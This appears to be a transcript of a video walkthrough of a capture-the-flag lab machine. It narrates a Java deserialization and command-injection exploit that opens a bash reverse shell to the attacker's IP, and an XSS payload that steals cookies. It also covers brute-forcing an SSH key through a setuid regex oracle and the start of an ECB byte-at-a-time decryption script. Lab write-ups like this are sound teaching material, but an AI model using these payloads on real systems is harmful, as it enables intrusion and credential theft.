looks like this one is good. Convert to and convert from. So we can copy this and paste these functions. So first off, we probably want this to be a public, not private. And the name of this is going to be 2byte array. And we can, I don't know if we want object here, do we? Maybe we do. I think we just want serializable. Maybe they're the same thing. Okay. And then this next piece, try output stream. This is probably more imports. I'm going to remove our previous imports. And we can add these. So add that. IO exception. Byte array stream. Add this. Okay. And then one of the comments on this, talking about the data is not flushed, so we can also just flush this as well. So we can just call out.flush. And I think that's good. So the next piece we probably have is the same thing. So public object, and this is just called from. And I think that's good. We can import that. Import. I think that's fine. Okay. So hopefully that all works. So utils from cannot make static reference. Let's see. I think we call these static. There we go. And we no longer have any errors on any of our files, which is amazing. So the next thing we have to do is just create the objects. So we start off with creating our profile. So our profile structure, and we create it. The first piece was the log or something. I don't think this piece matters. And then the next piece is admin, right? And we have to import this. There we go. Import that. And I want to say this is just erroring because it's not being used maybe. So the next piece of code, we want to write this to a file. So we can do file util. And then we want to import this. Let's see. We just do file util.write. There we go. It automatically imported that. I don't know what I did to cause that. But we want to now write the serialized object. So utils to byte array. And then the object we want to serialize is going to be profile. And then we write it to a location. So this is going to be ipsec.ser. Save this. And we probably have to import file. Okay. And this command is wrong. Uh-oh. IO exception, if we add throw. There we go. Awesome. So if I run this, we don't get anything, but hopefully we have an ipsec.ser somewhere. That's probably going to be in user profile, exploit, and here it is. So let me delete this real quick, run it again to prove. it just got created, right? And if we xxd it, it's probably going to start with ACED because that's the non-base64 thing. And if I strings this file, let's see, we just have this, and I'm hoping this L right here, this admin profile, this L is meaning true. Let's see. I don't know enough about this to go through it, but all we need is admin profile to be set to true for this file. There's nothing else that's important for this because, again, all we're triggering is, let's see, Java source v user profile storage.java. All we're triggering is when it reads this profile for this profile.isAdmin profile to be true. So we don't need the username or anything in this file. So I think we are good there. The next piece we're going to have to do is now write the next thing that has the command injection. Before we do that, remember the jwt.io that, oh, do I still have it here? We'll have to re-get that token. Oddly enough, it remembered my secret key, but erased the token in the reboot. Weird. But if I do base64, it begins with that row-ab that you know the ACED is base64, which is a serialized object. So let's create our user. So this, again, is going to go in the JWT token, then instructs everything where it begins. The user ID, we can just give that anything we want. I'm going to do 9001. And I forget exactly the number of ... slashes I used before when I was explaining this, but let's just try this. Ping-C1 for count, 10.10.14.8. Okay. And then we got to go up another directory because this put us in a directory. I want to say that's correct. And then we upload to data uploads, and I can call this ipsec.ser, I believe. Okay. And then the next two parameters of user don't matter, I don't think. We can import this. Okay. And what's this complaining about? Oh, we have to create a constructor. Oh, that's lovely. Create this. Okay. So we can say this dot, and it's going to be ID, username, password, fingerprint. So ID is equal to I. This dot username is equal to string. This dot password is equal to string 2. This dot fingerprint is equal to string 3. Now, again, this is bad code. We probably should have renamed the variables, but it's an exploit script. It's a quick hack job to get working. So as long as it works the first time or maybe the second time, we won't go into too many issues. So now we have to do the user profile storage. And we can declare this. There we go. User profile storage user, because we want to serialize this. So system.out.println and base64.get encoder, and it automatically imported that for me. Awesome. .encode to string, and what we want to encode is not arg0. It's going to be serutils.toByte array, and it's going to be UPS, which is our user profile storage. And I need to do system. See, I probably have a mismatch parentheses. Do I do 3? There we go. And that looks better. So if we run this, we have a base64 string now. So I can copy this, echo-n, paste, base64-d. Let's try it again. And we can see, let's just do a strings real quick, what our cookie looks like and where our username is. We have this. So hopefully we get code execution this way. And hope that our cookie is still saved for this box. So if we do 10.10.127.80.80/welcome, hey, we are. So we don't have to redo anything, I think. We got everything we can continue with. So what I'm going to do is upload ipsec.ser, and let's go through Burp Suite so you can see exactly what happens here. I was worried that when I did this, the cookie wouldn't be saved and I have to go do that like cross-site scripting step again to get the fingerprint and the Hibernate injection. So we can see this request, we're uploading ipsec.ser, which is our serialized string, and hoping that this admin profile is set to true. I don't know exactly how to verify that. I guess we could go back in Java, read the file, unserialize it, and check. But that sounds like a lot of work for something we can just test, right? So it's been uploaded to data uploads ipsec.ser. Sounds great to me. And then the next piece we have to do is just edit our JWT. So we can copy this, go here, paste this in, and we want to put a modified payload. So let's copy. And the key piece is you have the secret key there, and that came from the LFI in Python. So here's the new base64 object. And if we want, we can take a look at it again. I think I did, but yeah, I did. It's just got the payload where it says the username is going to be that .. thing. But before we run that, we want to do tcp dump -i ton0 icmp so we can see the ping packet come in. And I'm going to add the -n to not do DNS resolution. So we send this, we get error fetching profile, and we don't get a ping. So something went wrong, which is not good. I'm going to run it again. Nope, nothing. Let's see. So we do $this, ping 10.10.14.8, data uploads ipsec.ser. I think that's correct. We can add some more .. slashes just in case we're not there. Because I would think we're going to be in like a data directory. Let's just add more slashes this way. So .. slash. I'm not positive if Java cares about it. I know some programming languages, when you traverse beyond the root, bad things happen. I hope this is not one of those cases. So copy this. Let's go to the payload. I pasted it in the wrong spot. Put this. Copy. Go here. Put this. We still have error fetching profile. And we don't have a ping. So things are not looking good on us. Let's see. So we do this. We can put more .. slashes this side. I don't think it's going to help. I think we're going to have to like pause the video and do some troubleshooting and say exactly what happened here. But we can try this. Paste. Copy. Paste. Refresh. Error fetching profile. And still no ping. So something is seriously wrong. So guess I'm going to pause the video and see if I can figure it out. Okay, I haven't tested anything, but I did find out two different things that could be the issue. The first piece is interactual exploit code. We are, let me scroll to the right. Adding the .ser here, which we don't want to do, because if we go into the user, which is where the read function is, we can see it's going to do dir get absolute path / username and then append .ser. This username is really going to be like wonky, right? Username is equal to this. So it's going to do the absolute path, which I think was like data user or something like that. And then it's expecting to load ipsec.ser there. But again, we are doing this attack, which puts a bunch of ... slashes in, and it's a directory traversal. So that should fix it. So if we send this, we can copy, go to jwt.io, paste this in, and send this new thing. Make sure TCP dump is running, paste, send, and we don't get anything. So the second piece that could be erroring is when it's reading this serialized thing. So I did make a mistake here, I believe, because if we look at profile, is this where it reads it? See, this logs thing is null. I think that's what the issue is. Let's see. New profile. I don't know exactly where the read is. Get profile location. I think when it's reading the profile in, because this logs is null and not what it should be is this array list, it's just erroring out. It's got some like typing issue and just crashing because we're passing null when it should be an array list. So if I define that to be array list, change value of logs to be list object instead of list string. How did this start out? Let's see. Did we change this? Let's go to Java source, v profile. How is this stored, right? It's a list string, and that's how it is. If we just say, get rid of that null, does that fix it? No. Let's wonder, change type array list. We do it like this. And we have an issue here. Did I just fix it by clicking random things? No, I did not. We still have an issue. Let's see. If I just run this, it's going to crash on me, right? Proceed. Yeah. So we have something wrong here. So I don't know exactly how to fix this. So change type of logs to be list object. If we do that, I don't think this is going to work. But I guess there's no harm in trying, right? So let's upload the new ipsec.ser. Upload that. And then I don't think our base64 changes at all. So we can probably just go to burp suite, send it. It took a second. Is that hopeful? Nope, that worked. Let me do this again. Awesome. Just to like be 110% sure, let's remove ipsec.ser and do everything, this whole workflow, right? So run this. We created ipsec.ser. I'm going to upload it. I'm going to go through burp suite because this application doesn't give me any like indication I uploaded it. So upload. And there we go. We can see I have uploaded it. And then the next piece is we're going to go to repeater, copy this string. Where's jwt.io? Because we want to paste it in. And I don't think that changed at all. But the main thing I'm doing here is make sure all the changes I did, I wasn't like on one old piece of the file. I guess maybe I'm jumping the gun because we have to do this anyways because we want to change it away from ICMP. We want to do a reverse shell, right? So let's go back into Eclipse and I can go to this app.java. Instead of ping, let's do a reverse shell. So we can't use slashes. Slash is a bad character. So I'm going to do echo-n. I'm trying to think. Do I do echo and I can do a base64 cradle, or I can curl it and download code? Let's just do this. Echo-n. Let's do bash-i dev tcp 10.10.14.8 9001 0 and 1 base64 w0, and we can copy this. So we paste base64-d, pipe it over to bash. Okay. So if we run this now, we have a new base64 here. We just paste it in. Our user profile doesn't change, that ipsec.ser file. Again, the only thing that does is tell the server that we're an admin, right? So we didn't change a piece to that code. Paste this. And we don't get a response back, which means we have a reverse shell. So that piece of the video is done. I am happy for that. Hopefully it made sense. It took me a while to wrap my head around it, and OXDF helped me a lot, so big thanks to him. Hopefully that helped you. But now we have a shell. And because this video is long enough as is, I'm not going to bore you with all the limpy stuff. Let's just go straight to looking for like setuid binaries, because I know that's the next path. And our TTY is a bit weird. Let's fix that real quick. So I'm going to go to a new pane, stty-a, and 26105. So stty rows 26, col, I think 105. Yes, it was. Is it cols? Is there 4 characters for each? It is. So now when I go to the end of the screen, it properly does line wrapping. So I could go back here and do what I wanted to, even though this directory doesn't matter. We could look at the config and try to find passwords, but binary would be the next logical step. So if I do find -perm -4000, this is going to look for setuid. I'm going to hide error messages, so I send 2 to dev null. And we have everything. We could also do a -ls, and this will show us the permissions. We can see everything has the setuid bit. It's a bit noisy output, so I'm just going to do this. Oddly enough, there is this Chrome sandbox. cmatch is the one I really don't recognize. So if we do a ls-la on user bin cmatch, we have this as the John user. And also, an odd thing, this timestamp, I guess it was placed by a package manager because the modify is all zeros. I was going to think that the modification would not be all zeros. So forget that tangent. I'm guessing maybe this is an actual legitimate program. And if we just run cmatch, it says incorrect number of arguments. Or maybe it was like copied over an archive. I don't know. But if we give it 1 argument, we get that. If we get 2, it says no such file or directory. So I'm going to give it a file, etc passwd, and let's just do the second argument. And it says it found 51 matches. So that's weird. If I give this root, it found 3 matches. And if I grep root out of etc past wd, we see there's 3 times etc past wd says root. The user, I want to say the group, I don't know exactly what field that is, and then the home directory. So the next piece I want to do, does this support regular expressions? We're going to say, does this line begin with root? And we have found 1 match. So at this point, we have this cmatch binary that we can use to like exfil files potentially 1 character at a time by doing this whole match thing. And it runs as the John user. So my first step is, let's see if there's an ID RSA file in John's directory. So if I do home john.sh ID RSA, and I'm going to search for begin, because that's like begin private key, we found 1 match. So for this, we can brute force 1 character at a time this. And we're getting 2 matches because the begin and the end is the same, right? So if I do B here, now we have 1 match. So it's probably begin, private, I think. I forget exactly what it is. Is it a dash after? It is not. We'll just leave this as the known. So we want to create a Python script that can brute force this. So I'm going to go v, let's do it in www. Do I not have a www directory? I thought I did, but maybe not. V brute.py. And the very first thing we want to do is get a bunch of character sets. So I'm going to do from string, import ASCII uppercase, then ASCII lowercase, and digits. And I'm going to do these individually because I want to make this go somewhat fast. We also have to import subprocess because we want to be able to execute commands. And the other thing we need is the known. I'm going to set this to be begin like this. And this is how our program's going to start. But we also need symbols. And the SSH key is probably going to be base 64. So I'm just going to do character sets that are in base 64. Underscore and hyphen is going to be URL base 64. Plus and equals is normal base 64. There could be commas in this. There could be slashes. Could be colons. Could be pluses. Could be a space. And we also need line breaks, right? So, and maybe a return. Because sometimes it's a /n, sometimes it's a \r. So we don't know exactly what return it is. It's probably going to be /n, but it doesn't slow us down to add just 1 more, really. So the very first thing we have to do is create a function that's going to check for matches. So we're going to create it with check match, and I'm just going to call it data. And the result of subprocess.check output. And we're going to run cmatch home john ssh id rsa. And then we want to match what is data. And I don't think I need to put this in quotes, but I'm just doing it to be safe because there could be a space, and a space would separate arguments. So that's why I'm doing it with that. We do shell is equal to true. And then if this says found matches, so this is going to be false. So if we grab this, if found matches 0 in result, return false, else return true. And I know there's no else statement, but I really don't need it because the only time it's going to hit here is if this doesn't match, right? So that should be fine. Next thing we want to do is create a loop. So I'm going to do running is equal to true, and while running is equal to true, we're going to do a check matches. And I'm going to break this up into 4 different matches first, because this does support regular expressions. So I'm going to do check match, and we're going to do it against known first. And then the second thing is going to be uppercase characters. And the reason why I'm doing this is because it's going to speed it up, because it doesn't have to go through the whole dictionary every time, right? So if check match, let's just copy and paste. So instead of capital A to Z, we're going to do lowercase a to Z, and we'll set it to be lowercase. And then the next thing we want to do is digits, so 0 to 9. And then we'll set the character set to be digits. And then finally, we want symbols. And I'm just going to say else. And we're going to set it to be symbols. And we can make these now elifs, or like else ifs. So now we have a character set. It's probably going to match somewhere here. Let's see. I wonder if I should just break this well. The correct thing to do would be something like this. Put our symbols in that bracket, and then else set running to false. Because if it doesn't match any of those, chances are we're done. I guess we can try this. So let's do symbols and hope I don't break anything with this. So let's move this up, and then else we'll do running is equal to false, and that should end our program. I think we may have to break as well. So now we can do a for character in char set and say if check match, and this is going to be known plus the character. Then we want to print to screen, so print C, end is equal to nothing, flush is equal to true. And what this is going to do is create like a fancy like scrolling thing, because we're not going to print and like line breaks afterwards. It's just going to print the string as it like brute forces it. And after the match, we do known is equal to known plus C, and then break. And the only issue we're going to run into now is special characters in regular expressions. So I'm going to do if C in, and the special characters will probably be plus and slash. Let me go up here. I want to say that's the only ones we have. And if that's the case, then C is equal to escape plus C. So I think this is it. So I'm going to python 3-m http server, and we can go over here and say curl 10.10.14.8 8000 brute.py and pipe it over to Python, and we errored. cmatch. So we didn't escape special characters on this begin, and that's why. So I'm just going to change this. Instead of matching for the symbols, I'm just going to do the else like I had at first and leave that up to you. There we go. That should fix it. Run this. And here we have it, dumping data. I'm noticing two issues. The first one is we didn't type the first part at the beginning. And the second issue is our escaping regular expressions is making it into our key. So we can fix that by going back over to the script. And in here, if we do C, then -1, this is always going to get the last character. So if I go Python 3, A is equal to, we'll call it A, and then if we print A, -1, it still prints A, right? If this is BA and we print it, it's still 1. So it's always going to ignore that escape that we put in. So the next piece, we just want to print the known first. So we can print known and flush equals true. There we go. And now let's run this. And we have it printing out the key. And hopefully every line goes to the same spot, which it looks like it's doing, so success. I'm kind of curious how slow this would have went if we did not do the breaking it into 4 pieces. So I'm going to just pause this video, we'll get to when it's done, and we'll probably remove that piece of code and see how much slower it is. It is now done, so let's go and save this key real quick, and then make a quick edit to see how much this actually sped things up. So vi, what do I want to call this? john.key, paste it in, and then let's go over to a Python web server, cpbrute to brute2.py, and let us change this. So character set, all we have to do is char set is equal to ASCII uppercase plus ASCII lowercase plus digits plus symbols. Okay. And comment everything out. And now a brute force script should be unoptimized, right? So we run this. I mean, it's still faster than I expected because I guess many of the characters are uppercase, but you can definitely see it going a bit slower, right? If we do brute2 real quick, that's the speed it goes when we do that optimization. So you can see already it went faster. I did no video editing there. So we have that SSH key. So let us attempt to crack it. So we do SSH to John. I'd probably have to copy this over to the Kraken. So let's SCP the key over to the Kraken. And then we can SSH into it and go into my John directory where the SSH to John exists and give it the key. And then we can rename it to be john.key.hash. And then we can just run John against this. So we can do -- word list is equal to opt word list rocku.txt and then specify the file, and it's not going to crack. We could try going to our signing key, taking this and attempting to crack with the signing key because that's another like password that was on the server. And because password reuse, maybe it happens, but it's not this password. So let's go take a look back at the web server we're on. There's a bunch of files here. We can grep RI password on everything. See if we have anything. Do a search, so we highlight password. And everything I'm looking at, it doesn't have an actual password. It's just like property name, password. I don't think the password is app, so it's not that. Generally, when it comes to Java things, if it's a jar file, it's going to be like a thick client. If it's a web server, it's going to be compiled up into what's called a war file, WAR. So that's what I'm going to grep for here to see if we find anything. And we do. We have this internal app.war. So this is just a zip archive that contains a bunch of Java files. So let's copy this over to our box. So nclvnp 9001, and we'll send it to app.war, and we can run nc 10.10.14.8 9001 and direct this file there. So start this transfer, send the file, give it a few seconds. I should have checked how big this file was because Netcat doesn't tell us when it's done. So the best way to do it is md5 sum after you Control-C it and make sure the sums match. And it looks like they do. It begins with 1E, ends with B0. So we have the app.war here. And the next thing is just open it in JD GUI. Now, when I first did this box, I had issues. So I had to do app install open JDK 17-JDK because I had JDK, I think 11 on my box, which is old. And JD GUI wasn't compatible with it. So run java -- version. If you see open JDK 11, that's where you're going to have the issues. So you want to install the newer JDK, and then you can do JD GUI, and then open up app.war. And JD GUI is also inside of apt. So I think I just did sudo apt install JD GUI. So, yeah. So now that we have this, we can go into, I guess, webinf classes and start examining this. So we got this user DAO, and looking through, it doesn't do a great job at decompiling it. And we also get some Java bytecode here of things it couldn't decompile. I wonder if we can do a find. Navigation, search. Let's see, string. I'm just going to search for everything that contains password. Those nulls are not good. So user class. This one is just the column name, so we don't really care about that. There is a lib, Teradata, JDBC, drive manage connection. And this just has the word password in it, so that does not help us. This idea does not to be panning out well. So let's cancel this. And let us just look at the various files. So utils, we have crypt util. And is there a password in here? If we Control F, I'm just going to Control F all these and see if password exists. And Hibernate, it does. So it didn't decompile it, but we do have the Java bytecode. And we see when it does password, it loads it here. So I think this is the password. If we look above, we have the Hibernate connection username HTTP. And we see it's doing localhost 3306. So, and the database is Fingerprint. So we could try logging into this database. So if I, did copy work there? It did. So if I go here, we do mysql-u HTTP, I think -p like that, log in. Let's see. What is the database name? Fingerprint? Let's see, -h, localhost, lowercase h. So I don't know. Oh, I'm putting in password, the wrong clipboard. There we go. And now we get in. So use Fingerprint. And whenever I say wrong clipboard, if I do shift insert, it does one, control shift insert, it does another. So we can do show tables, describe users, and select star from users. So we can get all the hashes this way. We probably could have extracted the fingerprint from our Hibernate command. I'll try that out probably at the end of the video if it's not too long. But instead of like username, you would just do fingerprint in the HQL. And you could probably filter out and check with this since it's in the database. So you may not need that cross-site scripting step. You would just have to guess the column name is fingerprint, which isn't a stretch. So we got admin and Michael12345, but nothing really here. Was that this password? No. So we have 3 passwords to add. So let's go back here, v custom. Let's add the Hibernate password. Then let's add Michael's password. Then let's add admin's password. Okay. And rerun this John crack. And we get it. So it is the Q9 password, which was the Hibernate, the password to the database. So now we can go to a bash and sh-i john.key, john at 10.10.11.127, I want to say is the IP. Unprotected key file, chmod 600, john.key. It's going to ask us for the passphrase. We put it in, and we get logged in. And that's where user.txt is. So in the name of keeping this video somewhat short, I'm not going to go over all my normal recon, like running linps and things like that. We could start off by finding all the files owned by our user. That's always a good spot to start. So I do find/John and we direct errors to dev null. We have a lot of files. So the first thing I want to do here is let's hide some things. So I'm doing a grep-v to exclude, and I don't like varlib. And if we go up, there's proc. After proc, maybe we should just run this again because proc is so big. So let's just hide proc as well. And then probably run user and sys. So /run/user/sys. And we're getting a lot shorter. If I do a type F to only show me files, because like this .local I see as a directory, these directories are just like clogging up the space. We can see stuff. Obviously, we ran a command, we can see stuff, but I'm just looking through here. We have GNU PG keys, nothing really too interesting. We got an LXC config. So I type groups, I'm not part of the LXC group. Here's this bin cmatch thing, so that's that setuid binary that we had. If we change this user to look for members of our group, which is John, we have this file, var backups flask app secure.back. And also, if we looked at this directory, I'm guessing this file would have stuck out if we did like the timestamp checks, because we have the modify time. Like, actually, var backups will always have the modify time, I believe. So ignore the timestamp piece again in this video. Just Google or go to ipsec.rocks and do timestamps to find out what I'm talking about. I can do that for you. ipsec.rocks. We have to turn burp suite off. And timestamp. Yeah, like analyzing timestamps. This one in backend 2. These will all be good. So, I digress. We have that var backups. Let's go back in that directory. And that flask app secure.back. So I'm going to do a file against it. And we see it's just zip data. So let's copy this over to our box. So nc lvnp 9001 to, let's just copy this name and append a .zip. And we can say nc 10.10.14.8 9001 and direct that flask app to us. So we're going to give this a few seconds so it finishes the copy. And then let's go examine exactly what this is. Remember, the first app that we looked at was a Flask app. So let's unzip, Flask app secure. Thank God that put it in a directory and it clobbered my working directory. We have a thing that looks similar to the last Flask app and auth. If I look at improvements, we see fixed access control flaw, introduced authorization, and safe authentication with custom crypto. And whenever you hear custom crypto, it's probably going to be vulnerable. So if we look at auth.py, this looks similar. It's just going to grab stuff out of the database. So the real thing is in this app.py file, I guess. So we have a secret and a key that's going to be used for crypto. It's being put into ECB mode, which is electronic code block. And it's a very simple encryption mode. Every block is going to be encrypted the same exact way. So if you wanted to decrypt block 3, you don't have to decrypt block 1, I believe. And I'm bad with crypto, so I may be wrong there. That's my understanding. If it was in like CBC, which I think is cipher block chaining mode, then each block is dependent on the previous. So if you want to try to decrypt block 2 but didn't decrypt block 1, you're out of luck, right? Because every block depends on the next one. So knowing it's ECB, that's where my mind is going. The block size is going to be 16. Data logs. So this login. So we have this euser auth, and it's going to put, I guess, probably the username, and then the comma, the secret, and then true or false. So I'm guessing this one is going to be admin, right? So the cookie looks like username, secret, true, false. And if we have a way to create our own cookies, we're going to have some type of attack here. We'll probably get more into it in just a minute, but because our username is before the secret, if the block size is, let's do 8, because that's easy. So if we put username here, right, or username, that's 7 characters, right? And if the crypto encrypts this, it's going to put comma secret here. And since the block size is 8, so that would be the block, right? And this would be the next block. We would be able to register a username 1 byte at a time. And when we register username, comma, this block is going to look the same because that's exactly how it was. We put username, and the program appends this comma, and we analyze this block. And then what we do is we type username, comma, and then it appends comma secret, and that's going into the next block, which is completely irrelevant to us brute forcing 1 character at a time. So the next request we do, we would just send it user na, right? And that would be the rest of the block. And what it would do is append comma s, and we would brute force 1 byte at a time because we know the very first one is going to be comma. And we brute force this until something matches up. So that's going to be the attack. So keep that in the back of your head. I probably should have explained that right when we get to it. So I'm going to go over this stuff pretty quick. Load user, this is just going to load it, and it's decrypting the cookie with a split, which we will abuse. I'll explain that later. Admin, we have profile, and this profile is going to give us our new name. So if we access /profile without a UID or without as admin, it's going to direct us to a 302. Otherwise, it's going to generate a new name for us using that crypto. So we can abuse this parameter by just generating a bunch of, I guess, names. So the first thing to do to access this, though, is we have to get a cookie to this application. And we know there is a cross-site scripting vulnerability on fingerprint.htb, and we also don't know the port this is listening on. So we got 2 things. We have to, number 1, get the cookie. Number 2, get the port. So let's go and find out what port this is running on. So I think that is this pane. There we go. We could do SSLNTP, see all the running things. And there is a lot of ports that we don't know, like 8686, 4848. A lot of things are coming up that I'm not sure. We're listening on all host on 8088. I I guess this is just IPv4, and this is IPv4 and 6. Let's see. If we went into Etsy, find.grep flask, do we have anything? There's two systemd scripts. We have flask.service and flask.beta.service. If I looked at flask.service, this would just be port 80. If we look at flask beta, this will be port 8088. So we know we have to forward port 8088 to our box in order to access this, or we can do it all on this box itself, but I'm going to do an SSH tunnel so we can actually see the application. So I'm going to drop into SSH command line mode by making sure the squiggly C is the very first thing I type on a line. And then we can add -L 8088 to open up 8088 on our local box. And we're going to direct it to localhost 8088 through this SSH session. So now when I go down here, I can curl localhost 8088 and we get the page. So if I go to localhost 8088, we have my log. So this is the same exact application. We could try logging in with a bunch of credentials we have from previously, but I didn't take notes, and I know none of them will work. So the other thing we could do is revisit our cross-site scripting. So remember we wrote this pwn.xss where we directed them to our box and got fingerprint ID. We could do the same exact thing, but instead of get fingerprint ID, we can put document.cookie. I think it's .cookie. Is it cookie or cookies? Google document.cookie. So no S. And then /image. So we, yeah, we don't even have to include that other script source. So when I copy this, I can literally just copy this piece. And if we do nclvnp 80 with the sudo, we're now listening on that port. We can go to 10.10.127, port 8080, and we want to hit that login. And we paste this code. And unable to require JDBC connection. Did we crash this app? Let's see. That time it worked. That's weird. I'm just going to exit that MySQL session just to be safe. So we hit this. Okay, invalid credentials given. Let's see. That's NC. Here's my netcat. Okay. So let's go and test this real quick. If I, do I have an in-burp repeater? We do not. So let's see. This location is 8088. We want it to be on port 80. And I want to go to, I think it's /admin view auth.log. Is this the request? 10.10.11.127. Okay, so we can see what it's writing. We have our cross-site scripting payload in there. And that looks good. Oh, we have a hit. So they sent us user ID is equal to, and then this. So we got a bunch of hex. Awesome. So the next thing we want to do is, I guess, test out our cookie. So if I curl 10.10.11.127 /profile and -d for data, and we're going to put new name is equal to IPsec, and then -H cookie colon this, what happens? We actually want to curl localhost 8088 -v. Awesome. I'm going to add a -s in as well. And we want this cookie line. So I'm going to grep for set cookie. Let's see if I send 2 to 1. That did not do what I thought it would do. 2 and 1. Do I do it that way? Did that just crash completely? Let's see. So it does not like that. Okay, we do the and on that side. We grep cookie. So let's grep set cookie. There we go. And we want to grep op user ID is equal to // I believe. Let's see, like this. That's not working. Let's switch over to like awk. So we can do awk and then print substring. And then this will be, I think, match 1 and match 2. So if I do $2, comma 1, 8 to print the first 8 characters to make sure we have the right substring, that is set cookie. So I guess we start a match at 3, which would be user ID. And then let's go 8 to 10. That's an equals. So we can do... So what I just did there is I was saying if this is matching characters 1 through 8 or just 8 characters after 1. I didn't know which one it was. So that's why I changed the second parameter. We got 10. And since this didn't just give us 2 characters, which would be like 8 to 10, it gave us 10 characters after match 8. So we can do 9, and then I can do 32. And that's going to be the first block size because this looks like hexadecimal output. And we know the block size is 16. So if it's 16 characters, that would be 32 in hex. So that's why I did that. We could do a WC-C. We get 33, which is the 32 and a line break. I'm going to put a echo before my curl like this. So we just see the hash on a clear line. So now we know the block size. And what we have to do is change our new name. So right now, ipsec is 6 characters. We want to get this to 16. Actually, block size, I'm trying to think. I think we put 7 characters and we only care about 16 like this. Trying to think. No, I think it's like this. My brain is like mush right now. So let's just learn by doing, right? So I'm going to do a Python 3 command, and we're going to print 15 A's, right? So let's print A times 15. We have to put that in parentheses. I can't believe I made that mistake. So we have 15 A's here. So if I run this, we put 15 in this new name. We have 465E4 starting with the very first crypto block. If we put a 16th A, we get something completely different. However, we know it's going to append comma and then the secret for us, right? So we know the very first guess is going to be a comma. So if we do 15 A's and a comma, we get 465E4. So yeah, my explanation earlier when I was doing 8 characters confused me, but this one is a 16-byte block. So hopefully this makes sense. Like, this is 15 A's, and we know when the server does something, it's going to go and append, comma, the secret value, comma, true or false. So it fills up the very first block, and that's good. If we took off this awk, maybe this can help. So we have 15 A's, and that's the whole cookie, right? And if we add that comma here, we can see it matches up for the very first block. The first 32 characters, EB855F0AB. Let's see. It ends right, oh no. It ends at 69. Or no, F6. So we see this block matches up with this block. But after that, it gets completely different because in the one where we guessed, we put that comma there. So now the server appends, comma, secret, and it puts that in this whole new block. Whereas the very first one, it went here, or the first block started with SEC instead of comma SEC. So let's start creating a Python script, and if it doesn't make sense, maybe this will help. I don't know if it could or not, but yeah. So let's create, I'll call it block.py, I guess. I'm bad with names. So we're going to import request, and then, I think I spelled that right, from string import printable. And this is going to be an OXDF trick I learned. So if we printed printable, let's see, Python 3 block, the last 5 characters here are going to be bad, I believe, right? Or maybe we just don't use them at all. Let's see, block, we do -5. Yeah, the last 5 characters of printable are bad. So if we XXD this, we see it ends in that period. If I take off this, remove last 5, we get a bunch of like line break things, OA, OD, OB, OC. So man, ASCII, if you wanted to look at these, OA would be new line, vertical tab, form feed, caret feed. Apparently those are in the printable dictionary. So what he does is just as printable, -5 to get rid of those. It's a nice way to get a good character list. So we need 2 functions. The first function we're going to have is just going to get a cookie. And we'll put a guess here, right? And let me go back to my curl because we need all these parameters. So we mainly just need this. String at user ID and grab it. Because we need a legitimate cookie. So we're going to call this user ID colon the hex. And I had that copied, so we can remove this. There we go. And then the next thing we need is data. This is going to be the post request. So we called it new underscore name. And the value of that is going to be guess. And now we can do a request.post to HTTP localhost 8088/profile. And then we need to give it our cookies. Then data is equal to data. And we also want to tell it to not allow redirects. Because I think it did redirect us. If we do this curl, here we go. Get rid of all the greps. Yeah, we can see it's redirecting us to /admin. We don't want to follow that. We just want to grab this cookie. So let's go here, and we can say return r.cookies.get user ID. And if I didn't know this whole thing, like I didn't know this was the parameter, I would just return R, which would be the request. And I would then call get cookie and do ABC. And then I just execute Python 3 block, and I put a dash I that drops us into PDB after we run it. Request. I don't know where that SE came from. I guess I was talking while typing. But now we dropped in PDB, so we can look. We have to do R is equal to. And we can look at it. So we can do r.cookies and then .get user ID and figure out that's what we want to do. So r.cookies get user ID. Okay. So we have a function to get cookies. Now we want a function to test a block. So we can do def test block, and we can give it a block number. So we'll give it block, valid, and guess. And what this is going to do is attempt a request on /profile. I don't know how to explain it. It's so simple. I'm not going to comment my code because that'll just take longer, I guess, and maybe not help. It's hard to talk and type. So what test block is going to do is just, we're going to give it what we know the block is correct. So that will be, when we gave it previously, we just gave it 15 A's. And then it responds with the comma. That's going to be what valid is. Valid is going to be what we're guessing against. And then guess is going to be a single character, the input we're putting in. So hopefully this will make sense. So starting off, we have to do block times 32. Because if block is going to be 0, which will be the first block, this will be 0. If it's 1, it's going to be 32. If it's 2, it's going to be 64. So this is telling us where in the cookie to look for, right? And then we could do end is equal to start plus 32. So we can do cookie is equal to get cookie and guess. And then we can trim cookie. And we can just do it here. We can do start colon end, like that. And here we can say if cookie is equal to valid, start end, return true, else return false. So valid again is going to be the hash we're attempting to guess, and this is going to be our attempt. So this would be 15 A's and an A, and then that hash won't match valid. If we did 15 A's and a comma, then that would match valid in this example. So we can do known is equal to, and I'm going to leave it nothing. We could set this to, we can do a comma first and see if we get it. Generally, I would set it to nothing, because I know this is going to be valid and it would be a good test. If we determine it worked on, like if we went through the whole character set and nothing happened, we know there's an error because it should have flagged on comma. But in the ASCII printable, or the string printable, comma is one of the very last characters, so it's going to take a long time. Using the power of hindsight, I know the first character we're going to want is going to be a 7 because I have solved this challenge before. So it'll be much quicker to test this way. So while true, we have to determine the block we are on. So we can do block is equal to. Trying to think of a good way to get to 0. We can get an integer because this is going to produce a decimal. We can do length of known plus 1 divided by 16. And the reason why I'm adding this 1 here is because I want to trick the program to saying if our known is 15 characters, just go to the next block, because there was a check here for if new name is blank, return error. And if our known is 15 characters, then our name would have to be blank to be able to brute force it, and we can't. So that's why I'm adding this one here. The integer is because if we did Python, let's see, if we just dropped into Python 3 and did 1 divided by 16, it gives us a decimal. So integer would make that 0, right? And then 16 is 1. If we did 18, it's not rounding up. So if I did 15 over 16, it's still 0. So that's why I do this integer check there. And then we need to get the total size. So total size is going to be block times 16 plus 16. And the total size is going to be how much data we're padding with. So this is going to be the number of A's, right? Or like, I'm trying to think. If we had 4 characters, this will probably make sense in a minute. It's hard to formulate things into words, but if we're on the second block, we want the total size of our payload to be 32, right? So second block would be block 1 in this case because we started at 0. So 1 times 16 plus 16, that's 32. If we're on block 3, we'd want it to be 48. So 2 times 16 would be 32 plus 16 would be 48. So now we want to go through every character. So for C in printable minus the last 5 characters. And we can say guess is equal to known plus C. So we're taking what's up here, adding the random character to it. And we can say print. And if we do a carriage return first, this is going to force us to, I think flush is the word. And we can say guess and end with nothing. So this is going to give us a pretty like spinny wheel. So if we did Python 3 block.py, we forgot the in for C in printable. See, it's doing this little spinny thing. So we know it's working. It's going to do that. And we have to get the padding. So this is going to be the number of A's we put in. It can be any character, but we're going to say the total size. So this is going to be the total size of the request we want to make minus the length of our guess. And then we can give, let's see. And now I'm realizing a flaw in what I was going to do. So I'm just going to do this and we're going to change it in a minute. So the next thing is we need to get valid, right? So we can do valid is equal to get cookie padding. And the reason why I don't like this right now is I'm running the valid check every single time. So for every character, we're making 2 HTTP requests, which is double than what we 